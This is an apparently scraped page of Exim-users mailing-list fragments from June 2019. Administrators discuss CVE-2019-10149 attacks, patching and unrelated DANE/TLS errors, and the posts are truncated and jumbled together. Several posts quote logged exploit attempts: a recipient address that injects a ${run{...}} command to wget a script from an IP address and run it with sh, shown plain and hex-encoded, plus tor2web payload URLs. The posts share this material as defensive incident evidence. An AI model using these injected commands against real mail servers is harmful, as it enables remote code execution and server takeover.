Hell Niels,
12.06.2019 0:58, Niels Dettenbach writes:
> Am Dienstag, 11. Juni 2019, 18:57:41 CEST schrieb Konstantin Boyandin via
> Exim-users:
>> If I am not mistaken, CentOS 6.10 EPEL didn't apply any patches,
>> original Exim 4.91 is still their last version.
>
> The "initial official" date f
Viktor Dukhovni via Exim-users writes
> The thing is, that it as far as I can see only happens when receiving
> messages from the German mail provider GMX.
The gmx.de MTAs support DANE in both directions. Does your MX host
have published DANE TLSA records? Are they correct? Is your
certificate
> On Jun 11, 2019, at 2:08 PM, Thomas Krichel via Exim-users
> wrote:
>
>> shows that the error message in question is from the GnuTLS DANE
>> library in dane_state_init() trying to initialize libunbound...
>
> On the sender or the receiver? Is there any fix I can do
> or do I need to educate
Viktor Dukhovni via Exim-users writes
> A quick web search
Thank you for this!
I certainly tried to search the web many times for this problem
but I could not find a reason, let alone a fix. My problem
is that I'm not an email professional who only deals with these
issues day in and
Am Dienstag, 11. Juni 2019, 18:57:41 CEST schrieb Konstantin Boyandin via
Exim-users:
> If I am not mistaken, CentOS 6.10 EPEL didn't apply any patches,
> original Exim 4.91 is still their last version.
The "initial official" date for patch releases was "officially set" by Exim
project / securit
Might this be relevant?
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=929907
which also deals with GnuTLS record receive code.
cheers,
calum.
On 10/06/2019 4:51 pm, Arno Thuber via Exim-users wrote:
Hello,
today I suddenly started to see log lines telling me "A TLS fatal alert ha
Am 11.06.19 um 19:34 schrieb Calum Mackay:
> I'm still catching up, but…
>
> On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
>> Why didn't you harden your exim with the "allowed chars" change we
>> posted here on the list, or did you?
>
> Is that still necessary/advised, now I'm running
I'm still catching up, but…
On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
Why didn't you harden your exim with the "allowed chars" change we posted here
on the list, or did you?
Is that still necessary/advised, now I'm running 4.92?
thanks,
calum.
--
## List details at https:/
thanks all, for the replies.
On 11/06/2019 7:27 am, Odhiambo Washington wrote:
ought I to be reporting this anywhere?
Whom would you like to report to?? :-)
All vulnerable versions of Exim had a patch released several days ago.
Yes, I meant that there are clearly now exploits active, alth
> Am 11. Juni 2019 17:10:09 MESZ schrieb Cyborg via Exim-users
:
>> Hi Guys,
>>
>> at the end of this article, is a shodan graph of exim servers in the
>> wild :
>>
>> https://www.helpnetsecurity.com/2019/06/07/exim-cve-2019-10149/
>>
>> Guess which versions are 90% of all exims out there?
>
> I
On Tue, 11 Jun 2019 at 17:24, Niels Dettenbach (Syndicat IT & Internet) via
Exim-users wrote:
> If i read right, the most major distributors (as exim maintainers too)
> backported any patch or solution at least to the most used earlier versions
> (still provided in their patches / sec updates - s
Am 11. Juni 2019 17:10:09 MESZ schrieb Cyborg via Exim-users
:
>Hi Guys,
>
>at the end of this article, is a shodan graph of exim servers in the
>wild :
>
>https://www.helpnetsecurity.com/2019/06/07/exim-cve-2019-10149/
>
>Guess which versions are 90% of all exims out there?
If i read right, the
> On Jun 11, 2019, at 4:30 AM, Jeremy Harris via Exim-users
> wrote:
>
>> 2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt failed; TLS connection
>> to mx-ha03.web.de [212.227.15.17]: (certificate verification failed): TLSA
>> record problem: There was error initializing the DNS query.
>
> It'
On 11/06/2019 16:10, Cyborg via Exim-users wrote:
> at the end of this article, is a shodan graph of exim servers in the wild :
Since it doesn't account for patch status, not especially helpful.
--
Cheers,
Jeremy
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exi
Hi Guys,
at the end of this article, is a shodan graph of exim servers in the wild :
https://www.helpnetsecurity.com/2019/06/07/exim-cve-2019-10149/
Guess which versions are 90% of all exims out there? ;)
best regards,
Marius
--
## List details at https://lists.exim.org/mailman/listinfo/exim-
Hi,
Russell King (Di 11 Jun 2019 15:33:47 CEST):
> Hi,
>
> While looking for the fix on the web version of git.exim.org, I find that
> although I can get a listing based on the branch, I'm unable to get commit
> or commitdiffs.
>
> For example, the page at:
>
> https://git.exim.org/exim.git/sho
I googled 'an7kmd2wp4xo7hpr'
I came across
https://forums.zimbra.org/viewtopic.php?t=65932&start=120#p290739
Looks like Zimbra (I suppose / assume any MTA), is being "probed" and
pertaining to CVE-2019-9670
Regards
Brent
On 2019/06/11 14:46, Konstantin Boyandin via Exim-users wrote:
Hi C
Hi,
While looking for the fix on the web version of git.exim.org, I find that
although I can get a listing based on the branch, I'm unable to get commit
or commitdiffs.
For example, the page at:
https://git.exim.org/exim.git/shortlog/refs/heads/exim-4_91+fixes
gives links such as:
commit | c
Am 11.06.19 um 14:46 schrieb Konstantin Boyandin via Exim-users:
> I don't know where to report such things. To malware/antivirus
> manufacturers, perhaps?
>
> But the proper question is, IMHO, "why I haven't hardened my Exim
> installations while I could".
>
The Hoster:
#whois 1.2.3.4 | grep -i
Hi Calum,
Similarly, one of my honeypot VMs running exposed Exim 4.91 has been
attacked yesterday by similar means. The attacker, in my case, tried to
download and execute one of the below (I excluded scheme prefix from links):
an7kmd2wp4xo7hpr dot tor2web dot su/src/ldm
an7kmd2wp4xo7hpr dot tor2
On 11/06/2019 10:37, Thomas Krichel via Exim-users wrote:
> If I knew how to make this, sure. I'm trying with
>
> cat /home/ernad/test.mail | /usr/sbin/exim4 -t -d tls > /tmp/debug_tls.out 2>
> /tmp/debug_tls.err
Complex, because it was a 2-recipient message.
One was delivered, non-DANE becaus
Jeremy Harris via Exim-users writes
> On 11/06/2019 05:12, Thomas Krichel via Exim-users wrote:
> > I have an issue that has a similar feel to it. It's with a host of
> > Germanic providers gmx.de, gmx.at, web.de, mailbox.org ...
> >
> > 2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt fail
On 11/06/2019 05:12, Thomas Krichel via Exim-users wrote:
> I have an issue that has a similar feel to it. It's with a host of
> Germanic providers gmx.de, gmx.at, web.de, mailbox.org ...
>
> 2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt failed; TLS connection
> to mx-ha03.web.de [212.227
> > root+${run{/bin/bash -c "wget --no-check-certificate -T 36
> > https://185.162.235.211/ldm1ip -O /root/.fabyfmnp && sh /root/.fabyfmnp
> > -n" &}}@xxx: Too many "Received" headers - suspected mail loop
> >
> >
> Interesting script - targetting Linux systems using systemd.
Not only that, it is
On Tue, 11 Jun 2019 at 10:26, Cyborg via Exim-users
wrote:
> Am 11.06.19 um 02:10 schrieb Calum Mackay via Exim-users:
> >
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2f
Hi,
Am Di den 11. Jun 2019 um 7:53 schrieb Cyborg via Exim-users:
> :
> Restricted characters in address
Oh, you censored the address you are sending from? :-D
> This attack was presented to you by... the Seychelles Islands.
Ah, and I woundered why I did not see any try in my logs.
But I have
Am 11.06.19 um 02:10 schrieb Calum Mackay via Exim-users:
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\
27 matches
Mail list logo